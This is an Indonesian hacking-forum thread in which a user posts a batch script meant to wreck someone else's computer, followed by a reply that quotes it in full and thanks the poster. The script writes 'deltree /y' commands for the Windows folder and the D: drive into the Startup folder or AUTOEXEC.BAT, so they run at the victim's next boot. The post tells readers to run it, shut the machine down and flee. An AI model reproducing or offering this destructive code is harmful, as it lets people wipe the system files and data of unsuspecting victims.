Cyber-Hacker Community
Selamat datang di Cyber-Hacker Community .
Anda bebas untuk memposting cheat apapun disini !
Not Flaming,SARA,OOT,Junk !!

Nikmatilah cheat yang dishare disini ...


Thanks .

By : Admin Cyber-Hacker

Cyber-Hacker Community

Game Online Hacking
 
IndeksPortalGalleryFAQPencarianAnggotaGroupPendaftaranLogin
Top posters
~CH|Cbf Sergeant-Force~
 
~CH|♂Igoy♂~
 
~CH|X-FILE™~
 
wilson1998
 
~CH|CyberHacking™~
 
affdal
 
kote
 
~CH|Patoxneverdiie™~
 
~CH|FauzanJha
 
arya95
 
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Contact FB
Web Resmi Cyber-Hacker

Create Your Badge
Statistics
Total 1836 user terdaftar
User terdaftar terakhir adalah wilywwwy

Total 1245 kiriman artikel dari user in 251 subjects
User Yang Sedang Online
Total 1 user online :: 0 Terdaftar, 0 Tersembunyi dan 1 Tamu

Tidak ada

User online terbanyak adalah 18 pada Sat Jun 11, 2011 4:29 am

Share | 
 

 Script Perusak Sang Lamer

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
~CH|X-FILE™~
Cheaters Part II
Cheaters Part II


Jumlah posting : 64
Points : 192
Join date : 26.04.11

PostSubyek: Script Perusak Sang Lamer   Mon May 02, 2011 2:32 am

Ini khusus buat para "Lamer sejati" yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!

Okay, ngga' usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat

Code:

@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT


Well.. ga' perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi... program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.
Kembali Ke Atas Go down
Lihat profil user http://www.gilang-pku.blogspot.com
Cyber_Althaf
Newbie Cheaters
Newbie Cheaters


Jumlah posting : 9
Points : 11
Join date : 11.03.12
Lokasi : Batam

PostSubyek: Re: Script Perusak Sang Lamer   Tue Mar 20, 2012 9:46 pm

~CH|X-FILE™~ wrote:
Ini khusus buat para "Lamer sejati" yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!

Okay, ngga' usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat

Code:

@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT


Well.. ga' perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi... program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.


Izin nyomot gan....manteeeepppp nich postingannya... Good Good Good Good
Kembali Ke Atas Go down
Lihat profil user
 
Script Perusak Sang Lamer
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» bikin blog hemat energi!
» Ninja POLICE 911 (update)
» Sang Hitam Modif Asal2an dari Jogja Istimewa

Permissions in this forum:Anda tidak dapat menjawab topik
Cyber-Hacker Community :: Software Hacking-
Navigasi: